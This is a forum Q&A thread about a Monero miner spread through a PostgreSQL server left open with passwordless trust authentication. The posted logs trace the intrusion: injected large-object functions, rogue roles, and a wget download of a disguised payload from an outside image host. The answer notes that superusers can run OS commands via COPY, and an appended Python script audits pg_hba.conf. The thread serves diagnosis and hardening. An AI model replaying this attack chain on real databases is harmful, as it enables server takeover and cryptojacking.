PostgreSQL
Pavel Nekrasov, 2018-04-03 14:13:44

How does the monero virus distributed via postgresql work?

I somehow opened the PostgreSQL server for all connections, 0.0.0.0/0 trust, i.e. come in whoever you want, without a password.
And this is what appeared in the logs
[18419-1] postgres@postgres ERROR: large object 4000006040 does not exist
[18419-2] postgres@postgres STATEMENT: select lo_unlink(4000006040)
[18419-3] postgres@postgres ERROR: function obj4000006040( bigint, unknown) does not exist at character 8
[18419-4] postgres@postgres HINT: No function matches the given name and argument types. You might need to add explicit type casts.
[18419-5] postgres@postgres STATEMENT: select obj4000006040(4000006040, './tmp4000006040');
WARNING: you should run this program as super-user.
WARNING: output may be incomplete or inaccurate, you should run this program as super-user.
[18419-6] postgres@postgres ERROR: role "e894c9c8" already exists
[18419-8] postgres@postgres ERROR: role "e894c9c8" already exists
img1.imagehousing.com/0/art-981754.png
Resolving img1.imagehousing.com (img1.imagehousing.com)... 104.27.181.36, 104.27.180.36, 2400:
Connecting to img1.imagehousing.com (img1.imagehousing.com)|104.27.181.36|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 517120 (505K) [image/png]
Saving to: 'flagdspo.jpg'
[wget progress bar output omitted]
(77.4 MB/s) - 'flagdspo.jpg' saved [517120
[29796-10] postgres@postgres ERROR: role "pgsql" does not exist
[29796-11] postgres@postgres STATEMENT: DROP USER pgsql;
The file 4000006040 appeared in the /tmp/ folder; it is a monero client downloaded from the official github repository.
The question is really what these commands are and how this file got there. From the logs I don't quite understand what the obj4000006040 function is; having it would clarify everything. On the Internet I did not find a description of such a distribution method.

1 answer(s)
Melkij, 2018-04-03
@freeart

Everything is obvious:
the database superuser is a trusted person, and the database trusts this user. And the superuser, in many ways both tricky and not so tricky, can do anything on the server hosting the database that the OS user running postgres has enough rights to do.
For example, run any arbitrary command, even with the simple and obvious COPY command, not to mention some more exotic tricks.
The specific attack has apparently already been analysed and described here: https://habrahabr.ru/post/351452/
Never use trust, especially on a server exposed to the Internet. In its normal state the database should not be open to the world at all.
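As an added illustration (not code from the answer above or from the questioner's setup), here is a small pg_hba.conf audit in Python: it parses a constructed configuration mirroring the question (trust for 0.0.0.0/0) beside a constructed hardened one, and flags trust rules and rules reachable from any address.

```python
import ipaddress

# Constructed sample mirroring the question: "trust" for 0.0.0.0/0 means any host
# can connect as any role, including the superuser, with no password at all.
WEAK_HBA = """
# TYPE  DATABASE  USER  ADDRESS       METHOD
local   all       all                 peer
host    all       all   127.0.0.1/32  trust
host    all       all   0.0.0.0/0     trust
"""

# Constructed hardened version: password auth only, and only from where it is needed.
HARDENED_HBA = """
local   all       all                 peer
host    all       all   127.0.0.1/32  scram-sha-256
host    app       app   10.0.1.0/24   scram-sha-256
host    all       all   0.0.0.0/0     reject
"""

def parse_hba(text):
    """Return (type, database, user, address, method) for each active rule."""
    rules = []
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()   # drop comments and blank lines
        if not fields:
            continue
        if fields[0] == "local":
            rules.append((fields[0], fields[1], fields[2], None, fields[3]))
            continue
        # host rules: ADDRESS is a CIDR, "all", or an address plus a separate netmask field
        address, method = fields[3], fields[4]
        if "/" not in address and len(fields) >= 6 and fields[4][0].isdigit():
            address, method = f"{fields[3]}/{fields[4]}", fields[5]
        rules.append((fields[0], fields[1], fields[2], address, method))
    return rules

def audit_hba(text):
    """Flag rules that admit network clients without a password or from anywhere."""
    findings = []
    for _, db, user, address, method in parse_hba(text):
        if address is None:
            continue  # Unix-socket rules are not reachable over the network
        try:
            net = None if address == "all" else ipaddress.ip_network(address, strict=False)
        except ValueError:
            continue  # hostname, samehost or samenet: not evaluated here
        wide_open = net is None or net.prefixlen == 0
        loopback = net is not None and net.is_loopback
        if method == "trust":
            findings.append(("MEDIUM" if loopback else "HIGH",
                             f"trust (no password) for {user}@{db} from {address}"))
        if wide_open and method != "reject":
            findings.append(("MEDIUM", f"rule reachable from any address: {address} via {method}"))
    return findings
```

Running audit_hba on the weak sample yields one HIGH and two MEDIUM findings; the hardened sample yields none.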
